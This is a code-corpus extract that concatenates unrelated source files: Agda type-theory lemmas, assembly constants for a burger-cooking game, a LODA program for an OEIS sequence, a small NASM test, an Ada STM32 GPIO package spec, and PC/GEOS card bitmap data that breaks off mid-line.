⊢a ⇨ appRed* ⊢a D castΠRed* : ∀ {Γ F rF G A B e t} (⊢F : Γ ⊢ F ^ [ rF , ι ⁰ ]) (⊢G : Γ ∙ F ^ [ rF , ι ⁰ ] ⊢ G ^ [ ! , ι ⁰ ]) (⊢e : Γ ⊢ e ∷ Id (U ⁰) (Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰) A ^ [ % , next ⁰ ]) (⊢t : Γ ⊢ t ∷ Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰ ^ [ ! , ι ⁰ ]) (D : Γ ⊢ A ⇒* B ^ [ ! , ι ⁰ ]) → Γ ⊢ cast ⁰ (Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰) A e t ⇒* cast ⁰ (Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰) B e t ∷ A ^ ι ⁰ castΠRed* ⊢F ⊢G ⊢e ⊢t (id (univ ⊢A)) = id (castⱼ (Πⱼ ≡is≤ PE.refl ▹ ≡is≤ PE.refl ▹ un-univ ⊢F ▹ un-univ ⊢G) ⊢A ⊢e ⊢t) castΠRed* ⊢F ⊢G ⊢e ⊢t ((univ d) ⇨ D) = cast-Π-subst (un-univ ⊢F) (un-univ ⊢G) d ⊢e ⊢t ⇨ conv* (castΠRed* ⊢F ⊢G (conv ⊢e (univ (Id-cong (refl (univ 0<1 (wf ⊢F))) (refl (Πⱼ ≡is≤ PE.refl ▹ ≡is≤ PE.refl ▹ un-univ ⊢F ▹ un-univ ⊢G)) (subsetTerm d)))) ⊢t D) (sym (subset (univ d))) notredUterm* : ∀ {Γ r l l' A B} → Γ ⊢ Univ r l ⇒ A ∷ B ^ l' → ⊥ notredUterm* (conv D x) = notredUterm* D notredU* : ∀ {Γ r l l' A} → Γ ⊢ Univ r l ⇒ A ^ [ ! , l' ] → ⊥ notredU* (univ x) = notredUterm* x redU*gen : ∀ {Γ r l r' l' l''} → Γ ⊢ Univ r l ⇒* Univ r' l' ^ [ ! , l'' ] → Univ r l PE.≡ Univ r' l' redU*gen (id x) = PE.refl redU*gen (univ (conv x x₁) ⇨ D) = ⊥-elim (notredUterm* x) -- Typing of Idsym Idsymⱼ : ∀ {Γ A l x y e} → Γ ⊢ A ∷ U l ^ [ ! , next l ] → Γ ⊢ x ∷ A ^ [ ! , ι l ] → Γ ⊢ y ∷ A ^ [ ! , ι l ] → Γ ⊢ e ∷ Id A x y ^ [ % , ι l ] → Γ ⊢ Idsym A x y e ∷ Id A y x ^ [ % , ι l ] Idsymⱼ {Γ} {A} {l} {x} {y} {e} ⊢A ⊢x ⊢y ⊢e = let ⊢Γ = wfTerm ⊢A ⊢A = univ ⊢A ⊢P : Γ ∙ A ^ [ ! , ι l ] ⊢ Id (wk1 A) (var 0) (wk1 x) ^ [ % , ι l ] ⊢P = univ (Idⱼ (Twk.wkTerm (Twk.step Twk.id) (⊢Γ ∙ ⊢A) (un-univ ⊢A)) (var (⊢Γ ∙ ⊢A) here) (Twk.wkTerm (Twk.step Twk.id) (⊢Γ ∙ ⊢A) ⊢x)) ⊢refl : Γ ⊢ Idrefl A x ∷ Id (wk1 A) (var 0) (wk1 x) [ x ] ^ [ % , ι l ] ⊢refl = PE.subst₂ (λ X Y → Γ ⊢ Idrefl A x ∷ Id X x Y ^ [ % , ι l ]) (PE.sym (wk1-singleSubst A x)) (PE.sym (wk1-singleSubst x x)) (Idreflⱼ ⊢x) in PE.subst₂ (λ X Y → Γ ⊢ Idsym A x y e ∷ Id X y Y ^ [ % , ι l ]) (wk1-singleSubst A y) (wk1-singleSubst x y) (transpⱼ ⊢A ⊢P ⊢x ⊢refl ⊢y ⊢e) ▹▹ⱼ_▹_▹_▹_ : ∀ {Γ F rF lF G lG r l} → lF ≤ l → lG ≤ l → Γ ⊢ F ∷ (Univ rF lF) ^ [ ! , next lF ] → Γ ⊢ G ∷ (Univ r lG) ^ [ ! , next lG ] → Γ ⊢ F ^ rF ° lF ▹▹ G ° lG ° l ∷ (Univ r l) ^ [ ! , next l ] ▹▹ⱼ lF≤ ▹ lG≤ ▹ F ▹ G = Πⱼ lF≤ ▹ lG≤ ▹ F ▹ un-univ (Twk.wk (Twk.step Twk.id) ((wf (univ F)) ∙ (univ F)) (univ G)) ××ⱼ_▹_ : ∀ {Γ F G l} → Γ ⊢ F ∷ SProp l ^ [ ! , next l ] → Γ ⊢ G ∷ SProp l ^ [ ! , next l ] → Γ ⊢ F ×× G ∷ SProp l ^ [ ! , next l ] ××ⱼ F ▹ G = ∃ⱼ F ▹ un-univ (Twk.wk (Twk.step Twk.id) ((wf (univ F)) ∙ (univ F)) (univ G))

game_constants.asm

adkennan/BurgerMayhem

0

19838

; Game States GS_TITLE = $00 GS_START_GAME = $01 GS_PRE_LEVEL = $02 GS_RUNNING = $03 GS_POST_LEVEL = $04 GS_GAME_OVER = $05 FIRST_SPRITE = $20 LEVEL_COUNT = 11 ; Objects OBJ_NONE = $00 OBJ_BUN = $03 OBJ_PLATE = $04 OBJ_PLATE_FULL = $05 OBJ_TOMATO = $06 OBJ_TOM_CHOP = $07 OBJ_LETTUCE = $08 OBJ_LET_CHOP = $09 OBJ_MEAT_RAW = $0A OBJ_MEAT_COOK = $0B OBJ_PAN = $0C OBJ_PAN_COOKING = $0D OBJ_PAN_COOKED = $27 ; Status bar sprites SB_0 = 42 + FIRST_SPRITE SB_1 = 43 + FIRST_SPRITE SB_2 = 44 + FIRST_SPRITE SB_3 = 45 + FIRST_SPRITE SB_4 = 46 + FIRST_SPRITE SB_5 = 47 + FIRST_SPRITE SB_6 = 48 + FIRST_SPRITE SB_7 = 49 + FIRST_SPRITE SB_8 = 50 + FIRST_SPRITE SB_9 = 51 + FIRST_SPRITE SB_BURGER = 52 + FIRST_SPRITE SB_CLOCK = 53 + FIRST_SPRITE SB_COLON = 54 + FIRST_SPRITE ; Title screen burger parts TSB_TOP_BUN_1 = 59 + FIRST_SPRITE TSB_BOTTOM_BUN_1 = 60 + FIRST_SPRITE TSB_LETTUCE_1 = 61 + FIRST_SPRITE TSB_TOMATO_1 = 62 + FIRST_SPRITE TSB_MEAT_1 = 63 + FIRST_SPRITE ; Burger assembly state BURG_NONE = $00 BURG_BUN = $01 BURG_TOMATO = $02 BURG_LETTUCE = $04 BURG_MEAT = $08 BURG_ALL = BURG_BUN + BURG_TOMATO + BURG_LETTUCE + BURG_MEAT ; Tile TILE_FLOOR_0 = $00 ; 0000 0000 TILE_FLOOR_1 = $01 ; 0000 0001 TILE_FLOOR_2 = $02 ; 0000 0010 TILE_FLOOR_3 = $03 ; 0000 0011 TILE_SLIDER_N = $04 ; 0000 0100 TILE_SLIDER_S = $05 ; 0000 0101 TILE_SLIDER_E = $06 ; 0000 0110 TILE_SLIDER_W = $07 ; 0000 0111 TILE_VOID = $08 ; 0000 1000 TILE_PLATE = $09 ; 0000 1001 TILE_BUN = $0A ; 0000 1010 TILE_MEAT = $0B ; 0000 1011 TILE_TOMATO = $0C ; 0000 1100 TILE_LETTUCE = $0D ; 0000 1101 TILE_SERVE = $0E ; 0000 1110 TILE_BIN = $0F ; 0000 1111 TILE_BLOCKER_0 = $10 ; 0001 0000 TILE_BLOCKER_1 = $11 ; 0001 0001 TILE_BLOCKER_2 = $12 ; 0001 0010 TILE_BLOCKER_3 = $13 ; 0001 0011 TILE_WALL_0 = $20 ; 0010 0000 TILE_WALL_1 = $21 ; 0010 0001 TILE_WALL_2 = $22 ; 0010 0010 TILE_WALL_3 = $23 ; 0010 0011 TILE_BENCH = $40 ; 0100 0000 TILE_STOVE = $80 ; 1000 0000 TILE_CHOP = $C0 ; 1100 0000 TILE_EOL = $FF TILE_SLIDE_MASK = $07 TILE_BLOCKER_MASK = $F0 FIRST_WALL_TILE = TILE_VOID ; Activities ACT_MOVE = $00 ACT_CHOP = $01 ACT_COOK = $02 ; Messages MSG_NONE = $00 MSG_OK = $21 MSG_ERR = $22 MSG_BUN = $23 MSG_TOMATO = $24 MSG_LETTUCE = $25 MSG_MEAT_COOKED = $26 MSG_MEAT_RAW = $28 MSG_GO = $37 MSG_1_OF_4 = $38 MSG_2_OF_4 = $39 MSG_3_OF_4 = $3A ; Title screen constants LOGO_BURGER_SPR = FIRST_SPRITE + $40 LOGO_MAYHEM_SPR = FIRST_SPRITE + $44 LINE_1_START = 0 LINE_1_STOP = 52 LINE_2_START = 252 LINE_2_STOP = LINE_1_STOP + 48 BB_LEFT_X = 156 FG_FADE_LENGTH = 5 FG_FADE_FREQ = 5 ; Directions DIR_NONE = $00 DIR_S = $04 DIR_N = $08 DIR_E = $10 DIR_W = $20 DIR_SHRUG = $29 ; Level Offsets LVL_MP_LO = $00 ; Map Pointer Lo LVL_MP_HI = $01 ; Map Pointer Hi LVL_TL_M = $02 ; Time Limit Seconds LVL_TL_S_HI = $03 ; Time Limit Minutes LVL_TL_S_LO = $04 LVL_TARGET = $05 ; Target LVL_P1_X = $06 ; Player 1 Start X LVL_P1_Y = $07 ; Player 1 Start Y LVL_P2_X = $08 ; Player 2 Start X LVL_P2_Y = $09 ; Player 2 Start Y LVL_THEME_LO = $0A ; Theme pointer LVL_THEME_HI = $0B LVL_DESC_LO = $0C ; Description pointer LVL_DESC_HI = $0D LVL_DATA_SIZE = $0E LVL_TILE_MAP = $C400 ; Expanded map of tiles. THEME_BG_COL_2 = $00 THEME_BG_COL_3 = $01 THEME_SHADOW_COL = $02 THEME_SRC_CHARS = $03 THEME_W0_CHARS = $1B THEME_W0_FG = $24 THEME_W0_BG = $2D THEME_W1_CHARS = $36 THEME_W1_FG = $3F THEME_W1_BG = $48 THEME_W2_CHARS = $51 THEME_W2_FG = $5A THEME_W2_BG = $63 THEME_W3_CHARS = $6C THEME_W3_FG = $75 THEME_W3_BG = $7E THEME_F0_CHARS = $87 THEME_F0_FG = $90 THEME_F0_BG = $99 THEME_F1_CHARS = $A2 THEME_F1_FG = $AB THEME_F1_BG = $B4 THEME_F2_CHARS = $BD THEME_F2_FG = $C6 THEME_F2_BG = $CF THEME_F3_CHARS = $D8 THEME_F3_FG = $E1 THEME_F3_BG = $EA THEME_SRC_CHAR_COUNT = 24 FRAME_LINE_SIZE = $10 ; Number of bytes for per-line sprite data FL_OBJY = $0001 ; Y position of objects FL_SP4X = $0002 ; Sprite X and Y positions FL_SP5X = $0003 FL_SP6X = $0004 FL_SP7X = $0005 FL_MSIGX = $0006 ; Bit 9 of sprite X positions FL_SPENA = $0007 ; Sprite Enable FL_SP4COL = $0008 ; Sprite colours FL_SP5COL = $0009 FL_SP6COL = $000A FL_SP7COL = $000B FL_SPRPTR4 = $000C ; Sprite 4 pointer FL_SPRPTR5 = $000D ; Sprite 5 pointer FL_SPRPTR6 = $000E ; Sprite 6 pointer FL_SPRPTR7 = $000F ; Sprite 7 pointer FL_END = $0010 SL_WAIT_Y = $0000 SL_OBJY = $0001 ; Y position of objects SL_SP0X = $0002 ; Sprite X and Y positions SL_SP1X = $0003 SL_SP2X = $0004 SL_SP3X = $0005 SL_SP4X = $0006 SL_SP5X = $0007 SL_SP6X = $0008 SL_SP7X = $0009 SL_MSIGX = $000A ; Bit 9 of sprite X positions SL_SP0COL = $000B ; Sprite colours SL_SP1COL = $000C SL_SP2COL = $000D SL_SP3COL = $000E SL_SP4COL = $000F SL_SP5COL = $0010 SL_SP6COL = $0011 SL_SP7COL = $0012 SL_SPRPTR0 = $0013 ; Sprite frame pointers SL_SPRPTR1 = $0014 SL_SPRPTR2 = $0015 SL_SPRPTR3 = $0016 SL_SPRPTR4 = $0017 SL_SPRPTR5 = $0018 SL_SPRPTR6 = $0019 SL_SPRPTR7 = $001A ; Offsets into Player Data in zer o page PL_DIR = $00 ; Direction PL_X_LO = $01 ; X pixel PL_X_HI = $02 PL_Y = $03 ; Y pixel PL_FRAME = $04 ; Frame PL_OBJ = $05 ; Object carried PL_OBJ_VAL = $06 ; Value of carried object PL_MP_LO = $07 ; Screen char position of East foot PL_MP_HI = $08 ; PL_FRAME_COUNT = $09 ; Counter until next frame change PL_BUTTON = $0A ; State of button PL_ACTIVITY = $0B ; Current Activity - none, chop or cook PL_ACT_DIR = $0C ; Direction of Activity stick waggle PL_ACT_INDEX = $0D ; Index of the object we're acting on. PL_MSG = $0E ; Message sprite to display PL_MSG_COUNT = $0F ; Time remaining to show message or $FF to keep it PL_UPDATE_OBJ = $10 ; Index of object to update P_DATA_SIZE = $11 ; Size of player data PLAYER_FRAME_MASK = $3 MAP_WIDTH = 14 ANIM_FREQ = $07 ; Frequency at which to change chef animation frames PLAYER_LINE = 54 ; Line at which to initialize player sprites CHAR_ARROW_N = CHAR_BASE + (8 * CH_SLIDER_N) CHAR_ARROW_S = CHAR_ARROW_N + $8 CHAR_ARROW_E = CHAR_ARROW_S + $8 CHAR_ARROW_W = CHAR_ARROW_E + $8 CHAR_BLOCKER_0 = CHAR_BASE + (8 * CH_BLOCKER_1) CHAR_BLOCKER_1 = CHAR_BLOCKER_0 + $8 CHAR_BLOCKER_2 = CHAR_BLOCKER_1 + $8 CHAR_BLOCKER_3 = CHAR_BLOCKER_2 + $8 CHAR_WALL = CHAR_BASE + (8 * 40) BLOCKER_SEQ_SIZE = 6 LOOK_OFFSET_SIZE = 13 CHOICE_CONTINUE = 0 CHOICE_QUIT = 1 ; Graphics Characters CH_BLANK = $00 CH_FILLED = $01 CH_BLOCKER_1 = $02 CH_BLOCKER_2 = $03 CH_BLOCKER_3 = $04 CH_BLOCKER_4 = $05 CH_SLIDER_N = $06 CH_SLIDER_S = $07 CH_SLIDER_E = $08 CH_SLIDER_W = $09 CH_BOX_TOP_LEFT = $0A CH_BOX_TOP_RIGHT = $0B CH_BOX_BOTTOM_RIGHT = $0C CH_BOX_BOTTOM_LEFT = $0D CH_BOX_TOP = $0E CH_BOX_RIGHT = $0F CH_BOX_BOTTOM = $10 CH_BOX_LEFT = $11 CH_SHAD_N = $12 CH_SHAD_E = $13 CH_SHAD_W = $14 CH_SHAD_S = CH_BOX_BOTTOM CH_SHAD_N_NW_W = $15 CH_SHAD_N_NE_E = $16 CH_SHAD_S_SW_W = $17 CH_SHAD_S_SE_E = $18 CH_SHAD_NW = $19 CH_SHAD_NE = $1A CH_SHAD_SE = $1B CH_SHAD_SW = $1C CH_SHAD_N_NW = $1D CH_SHAD_N_NE = $1E CH_KNIFE = $1F CH_STOVE = $20 CH_SERVE = $21 CH_TOMATO = $22 CH_LETTUCE = $23 CH_PATTY = $24 CH_BUN = $25 CH_PLATE = $26 CH_BIN = $27 CH_THEME_00 = $28 CH_THEME_01 = $29 CH_THEME_02 = $2A CH_THEME_03 = $2B CH_THEME_04 = $2C CH_THEME_05 = $2D CH_THEME_06 = $2E CH_THEME_07 = $2F CH_THEME_08 = $30 CH_THEME_09 = $31 CH_THEME_10 = $32 CH_THEME_11 = $33 CH_THEME_12 = $34 CH_THEME_13 = $35 CH_THEME_14 = $36 CH_THEME_15 = $37 CH_THEME_16 = $38 CH_THEME_17 = $39 CH_THEME_18 = $3A CH_THEME_19 = $3B CH_THEME_20 = $3C CH_THEME_21 = $3D CH_THEME_22 = $3E CH_THEME_23 = $3F SRC_BUSH_00 = $40 SRC_BUSH_01 = $41 SRC_BUSH_02 = $42 SRC_BUSH_03 = $43 SRC_BUSH_04 = $44 SRC_BUSH_05 = $45 SRC_BUSH_06 = $46 SRC_BUSH_07 = $47 SRC_BUSH_08 = $48 SRC_ROCK_00 = $49 SRC_ROCK_01 = $4A SRC_ROCK_02 = $4B SRC_ROCK_03 = $4C SRC_ROCK_04 = $4D SRC_ROCK_05 = $4E SRC_ROCK_06 = $4F SRC_ROCK_07 = $50 SRC_ROCK_08 = $51 SRC_HOLE_00 = $52 SRC_HOLE_01 = $53 SRC_HOLE_02 = $54 SRC_HOLE_03 = $55 SRC_HOLE_04 = $56 SRC_HOLE_05 = $57 SRC_HOLE_06 = $58 SRC_HOLE_07 = $59 SRC_HOLE_08 = $5A SRC_GRASS_00 = $5B SRC_GRASS_01 = $5C SRC_GRASS_02 = $5D SRC_WALL_00 = $5E SRC_WALL_01 = $5F SRC_WALL_02 = $60 SRC_WALL_03 = $61 SRC_WALL_04 = $62 SRC_WALL_05 = $63 SRC_WALL_06 = $64 SRC_WALL_07 = $65 SRC_WALL_08 = $66 SRC_WINDOW_00 = $67 SRC_WINDOW_01 = $68 SRC_WINDOW_02 = $69 SRC_WINDOW_03 = $6A SRC_WINDOW_04 = $6B SRC_WINDOW_05 = $6C SRC_WINDOW_06 = $6D SRC_WINDOW_07 = $6E SRC_WINDOW_08 = $6F SRC_SAND_00 = $70 SRC_SAND_01 = $71 SRC_SAND_02 = $72 SRC_SAND_03 = $73 SRC_SAND_04 = $74 SRC_SAND_05 = $75 SRC_SAND_06 = $76 SRC_SAND_07 = $77 SRC_SAND_08 = $78 SRC_TREE_00 = $79 SRC_TREE_01 = $7A SRC_TREE_02 = $7B SRC_TREE_03 = $7C SRC_TREE_04 = $7D SRC_TREE_05 = $7E SRC_TREE_06 = $7F SRC_TREE_07 = $80 SRC_TREE_08 = $81 SRC_WOOD_00 = $82 SRC_WOOD_01 = $83 SRC_WOOD_02 = $84 SRC_WOOD_03 = $85 SRC_WOOD_04 = $86 SRC_WOOD_05 = $87 SRC_WOOD_06 = $88 SRC_WOOD_07 = $89 SRC_WOOD_08 = $8A SRC_CHECK_00 = $8B SRC_CHECK_01 = $8C SRC_CHECK_02 = $8D SRC_WALL_09 = $8E SRC_WALL_10 = $8F SRC_WALL_11 = $90 SRC_WALL_12 = $91 SRC_WALL_13 = $92 SRC_WALL_14 = $93 SRC_WALL_15 = $94 SRC_WALL_16 = $95 SRC_WALL_17 = $96 SRC_COBBLE_00 = $97 SRC_COBBLE_01 = $98 SRC_COBBLE_02 = $99 SRC_COBBLE_03 = $9A SRC_COBBLE_04 = $9B SRC_COBBLE_05 = $9C SRC_PUDDLE_LG_00 = $9D SRC_PUDDLE_LG_01 = $9E SRC_PUDDLE_SM_00 = $9F SRC_PUDDLE_LG_02 = $A0 SRC_PUDDLE_LG_03 = $A1 SRC_PUDDLE_SM_01 = $A2 SRC_CACTUS_00 = $A3 SRC_CACTUS_01 = $A4 SRC_CACTUS_02 = $A5 SRC_CACTUS_03 = $A6 ; UNUSED = $A7 ; UNUSED = $A8 SRC_SPACE_WINDOW_00 = $A9 SRC_SPACE_WINDOW_01 = $AA SRC_SPACE_WINDOW_02 = $AB SRC_SPACE_WINDOW_03 = $AC SRC_SPACE_WINDOW_04 = $AD SRC_SPACE_WINDOW_05 = $AE SRC_SPACE_WINDOW_06 = $AF SRC_SPACE_WINDOW_07 = $B0 SRC_SPACE_WINDOW_08 = $B1 SRC_SPACE_WALL_00 = $B2 SRC_SPACE_WALL_01 = $B3 SRC_SPACE_WALL_02 = $B4 SRC_SPACE_WALL_03 = $B5 SRC_LINE_00 = $B6 SRC_LINE_01 = $B7 SRC_LINE_02 = $B8 SRC_LINE_03 = $B9 SRC_LINE_04 = $BA SRC_LINE_05 = $BB SRC_LINE_06 = $BC SRC_LINE_07 = $BD SRC_LINE_08 = $BE SRC_LINE_09 = $BF SRC_LINE_10 = $C0

oeis/003/A003954.asm

neoneye/loda-programs

11

246802

<reponame>neoneye/loda-programs<gh_stars>10-100 ; A003954: Expansion of g.f.: (1+x)/(1-11*x). ; 1,12,132,1452,15972,175692,1932612,21258732,233846052,2572306572,28295372292,311249095212,3423740047332,37661140520652,414272545727172,4556998002998892,50126978032987812,551396758362865932,6065364341991525252,66719007761906777772,733909085380974555492,8072999939190720110412,88802999331097921214532,976832992642077133359852,10745162919062848466958372,118196792109691333136542092,1300164713206604664501963012,14301811845272651309521593132,157319930297999164404737524452 mov $1,11 pow $1,$0 sub $1,1 mul $1,12 add $1,10 div $1,11 add $1,1 mov $0,$1

src/test.asm

phiwen96/asm_mac

0

165972

%include "macros.asm" ; %include "platform.asm" global _main section .data message: define_byte "Ahe{jda", 10 length: equ $-message section .bss bufflen equ 2000 buff: resb bufflen section .text %define i preserved (0) %define n preserved (1) ; _loop_end: ; pop n ; pop i _main: mov arg (0), 2 ; call _lol_begin ; cin (buff, bufflen) ; cout (buff, bufflen) ; for (1, _funct) _end: _out "A" out ('\r\n') out ("B\n") out ("C") ; out_prep_data_2 (kuk2, "This is much more interesting than Hello, World!") ; cout (kuk, kuk_len) ; out ("This is much more interesting than Hello, World!") ; cout (message, length) ; out ("hejsan") exit ; _lol: ; cout (buff, strlen) _lol_begin: push i push n mov i, 0 ; loop-index i mov n, arg (0) ; max n _lool: mov rax, preserved (0) inc i cmp i, n jne _lool _lol_end: pop n pop i ret

host/stm32gd-gpio-pin.ads

ekoeppen/STM32_Generic_Ada_Drivers

1

4399

with STM32_SVD; use STM32_SVD; generic Pin : in GPIO_Pin; Port : in out Natural; Mode : in Pin_IO_Modes := Mode_In; Pull_Resistor : in Internal_Pin_Resistors := Floating; Alternate_Function : in GPIO_Alternate_Function := 0; package STM32GD.GPIO.Pin is pragma Preelaborate; procedure Init; procedure Set_Mode (Mode : Pin_IO_Modes); procedure Set_Type (Pin_Type : Pin_Output_Types); function Get_Pull_Resistor return Internal_Pin_Resistors; procedure Set_Pull_Resistor (Pull : Internal_Pin_Resistors); procedure Configure_Alternate_Function (AF : GPIO_Alternate_Function); function Is_Set return Boolean; procedure Set; procedure Clear; procedure Toggle; end STM32GD.GPIO.Pin;

Appl/Art/Decks/GeoDeck/LCClubK.asm

steakknife/pcgeos

504

244167

<filename>Appl/Art/Decks/GeoDeck/LCClubK.asm<gh_stars>100-1000 LCClubK label byte word C_BLACK Bitmap <71,100,BMC_PACKBITS,BMF_4BIT or mask BMT_MASK> db 0x00, 0x1f, 0xfa, 0xff, 0x00, 0xf0 db 0x01, 0xdd, 0xd0, 0xe1, 0x00, 0x01, 0xdd, 0xd0 db 0x00, 0x7f, 0xfa, 0xff, 0x00, 0xfc db 0x01, 0xd0, 0x0f, 0xe1, 0xff, 0x01, 0x00, 0xd0 db 0x00, 0x7f, 0xfa, 0xff, 0x00, 0xfc db 0x00, 0xd0, 0xe0, 0xff, 0x01, 0xf0, 0xd0 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xdf, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x05, 0x0f, 0x00, 0x00, 0xff, 0x00, 0x00, 0xe4, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x05, 0x0f, 0x00, 0x00, 0xff, 0x00, 0x00, 0xe4, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x05, 0x0f, 0xf0, 0x0f, 0xff, 0x00, 0x0f, 0xe4, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x04, 0x0f, 0xf0, 0x0f, 0xf0, 0x00, 0xe3, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x04, 0x0f, 0xf0, 0x0f, 0x00, 0x0f, 0xf7, 0xff, 0x0a, 0x0f, 0xff, 0xf0, 0xff, 0xff, 0x0f, 0xff, 0xf0, 0xff, 0xff, 0x0f, 0xf8, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x03, 0x0f, 0xf0, 0x00, 0x00, 0xf7, 0xff, 0x0c, 0xfc, 0x0f, 0xf7, 0x0c, 0x0f, 0x70, 0xc0, 0xf7, 0x0c, 0x0f, 0x7f, 0x0c, 0xf7, 0xf9, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x03, 0x0f, 0xf0, 0x00, 0x0f, 0xf6, 0xff, 0x0c, 0x00, 0x77, 0xf0, 0xf7, 0x77, 0x0f, 0x77, 0x70, 0xf7, 0x70, 0x0f, 0xf7, 0x7f, 0xfa, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x02, 0x0f, 0xf0, 0x00, 0xf5, 0xff, 0x0b, 0x0f, 0x07, 0x0e, 0x0f, 0x70, 0xe0, 0xf7, 0x0e, 0x0f, 0x0e, 0x0f, 0x77, 0xf9, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x05, 0x0f, 0xf0, 0x00, 0x0f, 0xff, 0xff, 0xf8, 0x00, 0x09, 0x0e, 0xe0, 0xee, 0xe0, 0x0e, 0xee, 0x00, 0xee, 0xe0, 0xee, 0xfd, 0x00, 0x00, 0x0f, 0xfc, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x06, 0x0f, 0xf0, 0x00, 0x00, 0xff, 0xff, 0x0f, 0xf9, 0xff, 0x09, 0xf0, 0xe0, 0xee, 0xee, 0x0e, 0xee, 0x0e, 0xee, 0xe0, 0xe0, 0xfd, 0xff, 0x00, 0x0f, 0xfc, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x06, 0x0f, 0xf0, 0x0f, 0x00, 0x0f, 0xff, 0x0f, 0xfe, 0xff, 0x01, 0x00, 0x0f, 0xfe, 0xff, 0x09, 0xf0, 0xce, 0xee, 0xce, 0xee, 0xce, 0xee, 0xce, 0xee, 0xc0, 0xfd, 0xff, 0x00, 0x0f, 0xfc, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x0b, 0x0f, 0xf0, 0x0f, 0xf0, 0x00, 0xff, 0x0f, 0xff, 0xff, 0xf0, 0xf0, 0x00, 0xfd, 0xff, 0x00, 0x0c, 0xfa, 0xec, 0x00, 0x0f, 0xfd, 0xff, 0x01, 0x0f, 0x7f, 0xfd, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x0c, 0x0f, 0xf0, 0x0f, 0xff, 0x00, 0x0f, 0x0f, 0xff, 0xff, 0x0f, 0x00, 0x00, 0x0f, 0xfe, 0xff, 0x00, 0x0c, 0xfa, 0xcc, 0x00, 0x0f, 0xfe, 0xff, 0x02, 0xf0, 0xe0, 0x7f, 0xfd, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x08, 0x0f, 0x00, 0x00, 0xff, 0x00, 0x00, 0x0f, 0xff, 0xff, 0xfe, 0x00, 0x00, 0x0f, 0xfe, 0xff, 0xf9, 0x00, 0xfd, 0xff, 0x02, 0xf0, 0xe0, 0x77, 0xfd, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x08, 0x0f, 0x00, 0x00, 0xff, 0x00, 0x00, 0x0f, 0xff, 0xff, 0xfe, 0x00, 0x00, 0x0f, 0xfe, 0xff, 0x03, 0x0f, 0x0f, 0xff, 0xff, 0xfe, 0x0f, 0x00, 0x00, 0xfd, 0xff, 0x02, 0x0e, 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0xff, 0x0d, 0x0e, 0xe7, 0x07, 0x77, 0x0c, 0xcc, 0xcc, 0x0e, 0x0e, 0xe0, 0xee, 0x00, 0x0e, 0xe0, 0xfe, 0x00, 0x03, 0xff, 0x9f, 0xff, 0x00, 0xfe, 0xff, 0x00, 0x0f, 0xfc, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfd, 0xff, 0x13, 0x0e, 0xee, 0x00, 0x00, 0xcc, 0xfc, 0xc0, 0xe0, 0xee, 0x0e, 0xe0, 0x00, 0x00, 0xee, 0x00, 0x0f, 0x00, 0x00, 0xff, 0x00, 0xfd, 0xff, 0x00, 0x0f, 0xfc, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfd, 0xff, 0x12, 0x0e, 0xe7, 0x0f, 0xf0, 0x0c, 0xcc, 0x0e, 0x0e, 0xe0, 0xee, 0x00, 0x0c, 0x00, 0x0e, 0xe0, 0x00, 0x0f, 0x00, 0x00, 0xfc, 0xff, 0x00, 0x0f, 0xfc, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfd, 0xff, 0x0e, 0x0e, 0xee, 0x0f, 0xff, 0xf0, 0x0c, 0x00, 0xf0, 0x0e, 0xe0, 0x00, 0xcc, 0xc0, 0x00, 0xee, 0xfe, 0x00, 0xfb, 0xff, 0x00, 0x0f, 0xfc, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfd, 0xff, 0x0c, 0x0e, 0xe7, 0x0f, 0xff, 0xff, 0xf0, 0xff, 0x0f, 0x00, 0x00, 0x0c, 0xcc, 0xcc, 0xfd, 0x00, 0xfa, 0xff, 0x00, 0x0f, 0xfc, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfd, 0xff, 0x05, 0x0e, 0xee, 0x0f, 0xff, 0xff, 0x00, 0xfc, 0xf0, 0x04, 0xfc, 0xf0, 0xf0, 0xff, 0xf0, 0xf9, 0xff, 0x00, 0x0f, 0xfc, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfd, 0xff, 0x04, 0x0e, 0xe7, 0x0f, 0xff, 0xff, 0xf8, 0x0f, 0x01, 0x00, 0xf0, 0xf9, 0xff, 0x00, 0x0f, 0xfc, 0xff, 0x00, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfd, 0xff, 0x08, 0x0e, 0xee, 0x0f, 0xff, 0xff, 0xf0, 0x0f, 0x00, 0x00, 0xfd, 0xf0, 0x02, 0xff, 0x0f, 0xf0, 0xf9, 0xff, 0x06, 0x0f, 0xff, 0x00, 0x00, 0x0f, 0xff, 0x00 db 0xf9, 0xff, 0x00, 0xfe db 0x00, 0x0f, 0xfd, 0xff, 0x02, 0x0e, 0xe7, 0x0f, 0xfe, 0xff, 0xfd, 